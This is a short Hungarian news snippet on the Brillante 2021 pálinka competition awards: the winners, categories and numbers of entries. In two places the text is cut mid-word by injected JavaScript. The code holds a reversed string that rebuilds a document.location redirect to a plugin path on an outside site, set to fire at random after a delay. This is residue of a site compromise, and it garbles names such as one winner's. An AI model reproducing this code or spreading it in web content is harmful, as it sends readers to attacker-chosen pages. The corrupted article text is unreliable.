A legjobb magánfőzött párlat a szadai Havelda Zoltán Fanyarka párlata; míg a legjobb bérfőzetett párlat címét Pataki Attila Mandarin párlata érdemelte ki idén Csákberényből. Idén először adták át az Év gyümölcséből, azaz a szőlőből készült párlatnak járó díjat, amelyet Nagy Botoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tond Királyleányka szőlő párlata nyert el Székelyhídról. A korábbi évekhez hasonlóan a fődíjak mellett champion, azaz kategóriagyőzteseket is hirdettek, illetve arany, ezüst és bronz minősítéseket osztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tottak ki. A versenyre 911 minta érkezett Magyarország minden részéről, emellett Szerbiából, Romániából és Szlovákiából is. Bérfőzetett párlatból 237-et, magánfőzöttből 674 mintát küldtek be. Legtöbb párlat az idei évben szőlőből érkezett, utána a szilva, majd…
A cikk folytatódik: http://gasztrokalandok.co.hu/alapfogalmak/2021/09/21/atadtak-a-brillante-2021-nemzetkozi-parlatverseny-dijait-a-gyulai-palinkafesztivalon.html
- Hirdetés -